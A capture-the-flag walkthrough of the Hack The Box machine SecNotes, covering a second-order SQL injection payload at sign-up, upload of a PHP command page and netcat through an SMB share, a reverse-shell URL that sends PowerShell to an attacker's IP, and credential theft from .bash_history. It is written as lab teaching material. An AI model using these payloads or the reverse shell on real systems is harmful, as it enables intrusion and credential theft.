HTB - SecNotes Walkthrough


Nmap

nmap -sS -sV -p- -oN portscan 10.10.10.97


We discover that this machine has two ports running IIS (80 and 8808) and SMB open.


Port 80

Navigate to the page on port 80, and you will find a login page.


I did try some default logins such as admin:admin, but like most CTFs, they are normally not that easy.

There is a useful weakness on the login page: its response tells you whether the username you entered is valid.

However, before I went down the path of guessing valid logins, I decided to try "sign up now" and create an account. This was successful and I was able to log in with the newly made credentials.


Once logged in, we instantly find a valid username: tyler. The first thing I tried was logging out and attempting to log in as tyler. The login page confirms that the username is valid; now we just need a password.

I tried SQLi attacks from the login screen, with no luck. XSS is also possible when creating a new note.

Note: Even though it will not work for this machine, I strongly recommend automating a SQLi attack on the username field with Burp. It may help on future machines where you want to try SQLi against a username.

Solution

You can perform a SQLi attack when creating a user; the username field is the injection point.

When creating a user, append ' OR +1=1 -- - to the username. Use any password you like and log in with your new credentials.

Note: ' OR +1=1 -- - is normally successful against most SQLi in CTFs, at least the ones I have completed.

From this we find tyler's password and an SMB share path.
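As an added illustration (not code from the walkthrough or from the box), the Python model below shows why appending the injection to the username at sign-up works and how a parameterized query prevents it. It assumes, as a constructed model, that sign-up stores the username with a parameterized INSERT but the later notes lookup concatenates the stored username into its SQL (a second-order injection); the table contents and secrets are made up.

```python
import sqlite3

# Constructed sample rows standing in for the site's notes table; secrets are made up.
SAMPLE_NOTES = [
    ("tyler", "tyler's private note (constructed sample secret)"),
    ("alice", "alice's shopping list"),
]

# The username from the walkthrough: a normal name with the injection appended at sign-up.
INJECTED_USERNAME = "bob' OR +1=1 -- -"


def build_db():
    """Create an in-memory notes table. Sign-up uses a parameterized INSERT, so the
    crafted username is stored verbatim; the bug only surfaces when it is re-used."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE notes (username TEXT NOT NULL, body TEXT NOT NULL)")
    conn.executemany("INSERT INTO notes VALUES (?, ?)", SAMPLE_NOTES)
    conn.execute("INSERT INTO notes VALUES (?, ?)", (INJECTED_USERNAME, "bob's own note"))
    conn.commit()
    return conn


def notes_for_user_vulnerable(conn, username):
    """Second-order SQLi (assumed model of the bug): the stored username is concatenated
    into the query text, so the WHERE clause becomes username = 'bob' OR +1=1 and the
    trailing quote is swallowed by the -- comment. Every user's notes come back."""
    sql = "SELECT username, body FROM notes WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def notes_for_user_safe(conn, username):
    """Hardened version: the username is bound as a parameter, never parsed as SQL,
    so the same stored value matches only its own row."""
    return conn.execute(
        "SELECT username, body FROM notes WHERE username = ?", (username,)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", notes_for_user_vulnerable(db, INJECTED_USERNAME))
    print("safe:      ", notes_for_user_safe(db, INJECTED_USERNAME))
```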

If you have not already done so, now would be a good time to add secnotes.htb to your /etc/hosts.


SMB

With tyler's credentials, we can now enumerate and exploit SMB.

To confirm that //secnotes.htb/new-site is a valid SMB share, run: smbclient --list //secnotes.htb -U tyler


Run smbclient //secnotes.htb/new-site -U tyler to log in.

From previous CTFs it was obvious that we would have to upload something to get a shell. Recall from the nmap scan that we found two ports running IIS. Whatever we upload to this SMB share is served by the IIS web server on port 8808.


Reverse Shell

To obtain a reverse shell, we need to upload a PHP page that executes cmd.exe commands. We will also need to upload the 64-bit netcat executable (nc64.exe).

You can execute cmd.exe commands from PHP in multiple ways. However, I quite liked doing it this way because it is quite different from the usual way I have uploaded a shell.



After you have uploaded your files and have your netcat listener ready, enter the URL:

http://secnotes.htb:8808/cmd.php?cmd=nc64+-e+powershell.exe+<ip>+<port>

You can now go and get the user flag.


Privilege Escalation

After you obtain the user flag, you will see a file called bash.lnk, and you will also have seen folders called Distros and Ubuntu.

Thanks to a video by Network Chuck about installing Kali on Windows, I was aware that a Linux subsystem can be installed on Windows.

To start using bash, enter:

bash

python -c 'import pty; pty.spawn("/bin/sh")'


Unfortunately, being root inside the Linux subsystem does not escalate our privileges on the Windows host, so it does not get us the root flag.

Navigate to the root user's home directory (/root) and cat .bash_history.


We find the Administrator credentials in it; we can now log in through SMB and obtain the root flag.
